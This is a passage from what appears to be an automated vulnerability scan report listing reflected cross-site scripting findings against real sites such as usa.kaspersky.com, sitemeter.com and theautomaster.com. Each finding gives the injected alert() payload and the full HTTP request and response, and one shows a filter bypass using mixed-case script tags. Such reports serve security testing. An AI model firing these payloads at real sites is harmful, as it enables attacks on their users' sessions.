Date: Sun, 17 Apr 2011 12:59:57 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_company_landing6210f<script>alert(1)</script>d253288866b',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303045152447-372951.17");

4.45. http://s25.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s25.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18a21'%3balert(1)//a3344cc69fd was submitted in the site parameter. This input was echoed as 18a21';alert(1)//a3344cc69fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s25hadashot18a21'%3balert(1)//a3344cc69fd HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:35:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 17 Apr 2011 14:45:04 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s25hadashot18a21';alert(1)//a3344cc69fd', 's25.sitemeter.com', '');

var g_sLastCodeName = 's25hadashot18a21';alert(1)//a3344cc69fd';
// ]]>
...[SNIP]...

4.46. http://s25.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s25.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f79'%3balert(1)//80af3977918 was submitted in the site parameter. This input was echoed as 39f79';alert(1)//80af3977918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s25hadashot39f79'%3balert(1)//80af3977918 HTTP/1.1
Host: s25.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:35:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 17 Apr 2011 14:45:05 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s25hadashot39f79';alert(1)//80af3977918', 's25.sitemeter.com', '');

var g_sLastCodeName = 's25hadashot39f79';alert(1)//80af3977918';
// ]]>
...[SNIP]...

4.47. http://theautomaster.com/smartbrowse/ajax/new.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6c3"><script>alert(1)</script>d3cbc0a7a50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowseab6c3"><script>alert(1)</script>d3cbc0a7a50/ajax/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=true&showTrim=&showBodyStyle=true&showMileage=true&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f434b3b0a0a002d004d9ebf7ccb20d0; JSESSIONID=10ue49uec8ctq; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 17:04:30 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14533

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=theautomaster.com&amp;21=/smartbrowseab6c3"><script>alert(1)</script>d3cbc0a7a50/ajax/new.htm&amp;50=5f434b3b0a0a002d004d9ebf7ccb20d0&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-
...[SNIP]...

4.48. http://theautomaster.com/smartbrowse/ajax/new.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e37f"><script>alert(1)</script>2357d3fddc1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajax1e37f"><script>alert(1)</script>2357d3fddc1/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=true&showTrim=&showBodyStyle=true&showMileage=true&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=5f434b3b0a0a002d004d9ebf7ccb20d0; JSESSIONID=10ue49uec8ctq; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE

Response

HTTP/1.1 404 Not Found
Date: Sat, 16 Apr 2011 17:04:42 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14533

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=theautomaster.com&amp;21=/smartbrowse/ajax1e37f"><script>alert(1)</script>2357d3fddc1/new.htm&amp;50=5f434b3b0a0a002d004d9ebf7ccb20d0&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&
...[SNIP]...

4.49. http://theautomaster.com/used-inventory/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /used-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4380"><script>alert(1)</script>7f92519afdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventoryf4380"><script>alert(1)</script>7f92519afdd/index.htm?reset=InventoryListing HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=111725121.1303003248.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/15; ssoid=610cf6690a0a002d004d9ebff580a7e7; JSESSIONID=1sdotl64whyrk; lbpoolmember=1711345162.40475.0000; ddcpoolid=CmsPoolE; __utma=111725121.1506997093.1302973362.1302973362.1303003248.2; __utmc=111725121; __utmb=111725121.14.5.1303003427103

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 01:41:05 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14691

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=7ddc8'-alert(document.cookie)-'4ac342c68e7&amp;20=theautomaster.com&amp;21=/used-inventoryf4380"><script>alert(1)</script>7f92519afdd/index.htm&amp;50=610cf6690a0a002d004d9ebff580a7e7&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

4.50. http://ts.istrack.com/trackingAPI.js [vti parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ts.istrack.com
Path:   /trackingAPI.js

Issue detail

The value of the vti request parameter is copied into the HTML document as plain text between tags. The payload 84994<script>alert(1)</script>651019c713b was submitted in the vti parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackingAPI.js?ai=1/b7YsF5/LZw+m6HdoJfHSWrtAPLOT1z&evt=20&ri=54028&ii=40200&vti=1c4WFQoBC2cAABF-Y28AAAAAACGeq@x@J8zrRG84994<script>alert(1)</script>651019c713b HTTP/1.1
Host: ts.istrack.com
Proxy-Connection: keep-alive
Referer: http://www.bitdefender.com/solutions/antivirus.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:59:29 GMT
Server: Apache
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 114
Connection: close
Content-Type: text/javascript; charset=utf-8

ISVT_setCookie('isvt_visitor', '1c4WFQoBC2cAABF-Y28AAAAAACGeq@x@J8zrRG84994<script>alert(1)</script>651019c713b');

4.51. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420aa"><script>alert(1)</script>7e822a04924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?420aa"><script>alert(1)</script>7e822a04924=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:04:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045499"
Content-Type: text/html; charset=utf-8
Content-Length: 41098
Date: Sun, 17 Apr 2011 13:05:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?420aa"><script>alert(1)</script>7e822a04924=1" />
...[SNIP]...

4.52. http://usa.kaspersky.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 111b7"-alert(1)-"57da2f5aecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads111b7"-alert(1)-"57da2f5aecf HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045201"
Content-Type: text/html; charset=utf-8
Content-Length: 30202
Date: Sun, 17 Apr 2011 13:00:04 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads111b7"-alert(1)-"57da2f5aecf";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.53. http://usa.kaspersky.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /downloads85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 12:59:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045196"
Content-Type: text/html; charset=utf-8
Content-Length: 30299
Date: Sun, 17 Apr 2011 12:59:58 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads85cf9"><ScRiPt>alert(1)</ScRiPt>2d924d33a07" />
...[SNIP]...

4.54. http://usa.kaspersky.com/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 213ed"><script>alert(1)</script>2b51f9931de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads?213ed"><script>alert(1)</script>2b51f9931de=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://www.kaspersky.com/virusscanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 12:59:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045186"
Content-Type: text/html; charset=utf-8
Content-Length: 53136
Date: Sun, 17 Apr 2011 12:59:48 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads?213ed"><script>alert(1)</script>2b51f9931de=1" />
...[SNIP]...

4.55. http://usa.kaspersky.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b646"><script>alert(1)</script>ae9adfd699b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html6b646"><script>alert(1)</script>ae9adfd699b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045517"
Content-Type: text/html; charset=utf-8
Content-Length: 30304
Date: Sun, 17 Apr 2011 13:05:19 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html6b646"><script>alert(1)</script>ae9adfd699b" />
...[SNIP]...

4.56. http://usa.kaspersky.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32ac5"-alert(1)-"a94f7d736ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html32ac5"-alert(1)-"a94f7d736ee HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045522"
Content-Type: text/html; charset=utf-8
Content-Length: 30208
Date: Sun, 17 Apr 2011 13:05:23 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html32ac5"-alert(1)-"a94f7d736ee";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.57. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487ba"><script>alert(1)</script>aa7cd075570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?487ba"><script>alert(1)</script>aa7cd075570=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045508"
